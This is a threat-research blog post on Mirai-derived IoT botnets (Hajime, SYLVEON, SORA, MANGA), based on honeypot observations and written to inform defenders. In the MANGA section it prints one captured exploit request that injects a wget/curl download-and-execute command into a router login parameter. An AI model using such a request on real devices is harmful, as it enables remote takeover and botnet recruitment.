FortiGuard Labs Threat Research

The Ghosts of Mirai

By David Maciejak and Joie Salvio | June 24, 2021

FortiGuard Labs Threat Research Report

Affected Platforms: Linux
Impacted Users:      Any organization
Impact:                     Remote attackers gain control of the vulnerable systems
Severity Level:         Critical

It has been almost five years since the source code of the notorious MIRAI IoT malware was released to the public by its author in late 2016. This event led to the emergence of numerous copycats, creating their own flavors of IoT botnet armies. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same.

IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. They also seek to exploit known—and sometimes even zero-day—vulnerabilities to increase their chances of gaining access. And once they do, malicious binaries are downloaded and executed that make the device part of a zombie network that could then be instructed to participate in a Distributed Denial-of-Service (DDOS) attack that could cause a service outage to an unfortunate target. Some threat actors even sell these curated botnets as a service.

We have been closely monitoring the current state of the IoT botnet threat landscape through the perspective of an IoT device with the help of a honeypot system. This article describes our observations over the last few weeks.

Where are These Attacks Coming From?

To simulate what it would be like for a new IoT device to be connected to the internet for the first time, we set up a fresh honeypot system to capture what kinds of attacks it would receive. This honeypot was designed to be vulnerable to telnet credential brute force attacks. The statistics in this article were taken from a three-week period.

On average, this honeypot system received around 200 attacks per day, ultimately recording nearly 4700 telnet connections in just three weeks. We were then able to identify nearly 4000 of those attacks and connect them to a Mirai-related malware family. 

Figure 1 Number of telnet connections per day

Since this honeypot does not execute any of the downloaded binaries, most of the attacks keep retrying until their malware has executed in the system. By removing IP duplicates, the actual number of attack sources was obtained and is broken down in the next table.

Figure 2 Unique telnet source IPs per country

Top IoT Malware Variants

Mirai variant authors use unique strings or tokens in their binaries that are used to verify whether SSH or Telnet commands were successfully executed in the device—although this could also be used by the threat actors to advertise their malware or, in some cases, simply as a placeholder for novelty messages.

The figure below shows a sequence of commands that the SORA Mirai variant executes immediately after gaining access to a device.

Figure 3 Sample shell commands executed by a SORA bot

These strings have been heavily used by researchers over time to classify variants. However, there are cases where variants may use different tokens but turn out to be the same malware function-wise—and are even operated by the same threat actor. In such cases, analyzing the actual binary being downloaded into the device would greatly help further define the number of existing variants.

Based on the attacks received by the honeypot, the following table shows the top 10 variants we were able to identify.

Figure 4 Top ten identified variants

The Enigmatic “Hajime”

Hajime was dubbed as the successor to the first generation of Mirai. Built on the same principle and goals as of its predecessor, it tries to propagate to IOT devices by means of brute-forcing credentials using a password list of common default device passwords. However, unlike Mirai, Hajime utilizes a decentralized peer-to-peer network to issue commands to its bots. This makes it much harder to locate the Command-and-Control (C2) server for a takedown.

Aside from its sophisticated bot network communication, it is also one of the most mysterious variants due to its vague intentions. Commands sent to Hajime bots are in the form of structured messages that are passed along in the peer-to-peer network. One of these commands instruct bots to download and execute binaries, internally called "modules". Only the spreading module has been observed being served in the wild. No attack or disruptive modules have been observed, and Hajime has never been associated with any disruption attacks. Furthermore, part of its behavior is to block access to ports that are commonly targeted by other IoT malware, thereby inadvertently (or not) somewhat protecting the infected device from further infections.

Lastly, it delivers the following message to the device’s terminal:

Just a white hat, securing some systems.

Important messages will be signed like this!

Hajime Author.

Contact CLOSED Stay sharp!

It was only a matter of time before some speculated that Hajime might be the work of a real vigilante.

SYLVEON Coming Out of Retirement?

What surprised us more was the appearance of the SYLVEON variant on the table. In mid-2019 there was a 14-year old European IoT malware author that went by the name of “Light The Sylveon” and “Light The Leafeon”. 

When we took quick look at the decrypted strings of one of the binaries we captured, the word “Leafeon” was found, creating speculation that this might be the author’s comeback.

Figure 5 Strings found in SYLVEON binaries

“Light the Sylveon” co-created the destructive SILEX IoT malware, whose goal was to render vulnerable devices inoperable by running destructive commands–very similar to BrickerBot. From the malware authors’ perspective, based on a message embedded in the malware’s binary, this was to “prevent skids to flex their skidded botnet.”

Eventually, the “Light The Sylveon” author announced through a post on his twitter account that he was going to abandon the project.

Figure 6 "Light The Sylveon" announces quitting on a twitter post

Unlike SILEX, however, SYLVEON is a conventional IoT malware that was clearly based on the Mirai source code with some added attacks.

Figure 7 Function name list found in a SYLVEON binary

Interestingly enough, the group greek.Helios and a certain Thar3seller, which were a group previously associated with other IoT malware campaigns, currently claim to be the authors of this variant.

Figure 8 Strings found in a SYLVEON binary

The relationship between these different authors is still unclear. What we are certain about is that this variant is being actively operated, as also shown by recently updated binaries found in one of its download servers.

Figure 9 Open directory hosting SYLVEON variant

SORA - The Surviving Member of the Wicked Family

It is also interesting to see Mirai variants that were authored by the threat actor known as Wicked that we covered three years ago. These variants include Owari, Omni, Wicked, and SORA. Based on an interview at that time, the author stated he was going to focus on Owari and Omni while abandoning the other two variants, including SORA. Based on our observastions, it seems that SORA has more successfully survived than its siblings.

Mirai Variant MANGA Actively Updates its List of Targeted Vulnerabilities

Aside from the honeypot, we have also been monitoring Mirai variants from other sources. In particular, we have been closely monitoring the developments of the MANGA variant because it is one of the most active in terms of adding new exploit vectors to its list. 

In fact, just a week ago, it added several more exploits, two of which are fairly recent:

Figure 10 Sample request leading to an RCE on OptiLink GPON
Figure 11 Sample request targeting CVE-2021-1498
Figure 12 Sample request targeting CVE-2021-31755
  • Unknown 1 (Unidentified target)
Sample request:
Figure 13 Sample request targeting an unknown target

Here is a list of other vulnerabilities this malware variant tries to exploit: 




F5 iControl REST Remote Code Execution


mini_httpd 1.18 Escape Sequence


XiongMai uc-httpd Buffer Overflow


TerraMaster TOS Remote Code Execution


D-Link DIR-825 Buffer Overflow


D-Link DNS-320 Remote Code Execution


Micro Focus OBR Remote Code Execution


Yealink DM (Device Management) Remote Code Execution


F5 BIG-IP Buffer Overflow


SonicWall SSL-VPN Remote Code Execution

Unknown 2

key parameter on /cgi-bin/login.cgi leading to Remote Code Execution


Sample request:

POST /cgi-bin/login.cgi HTTP/1.1

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0


key=';`cd /tmp; wget http://{REDACTED IP}/; curl -O http://{REDACTED IP}/; chmod 777; sh;`;#

Figure 14 List of other vulnerabilities being targeted by Manga


As the number of installed IoT devices continues to explode, especially given the current lack of security standards available to protect them, IoT will be a hotbed for malware operations for the foreseeable future, as we have demonstrated in this article. And interestingly, Mirai variants are still very active in terms of attack and development.


Every artifact collected from our honeypot systems and other sources are automatically processed to ensure that our customers are protected from these attacks. That said, the following precautions are highly recommended:

  • As credential brute-forcing is still the primary way malwares get into IoT devices, setting usernames and passwords that are difficult to guess can go a long way towards securing them. 
  • In addition, to protect against known vulnerabilities, always keep device software up to date.

Fortinet customers are protected by the following:



Files (SHA256)

Download URLs


Files (SHA256)
Download URLs

Sample commands after gaining access:


Files (SHA256)

Download URLs

Sample commands after gaining access:

Learn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security Subscriptions and Services portfolio.

Learn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda (TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans program.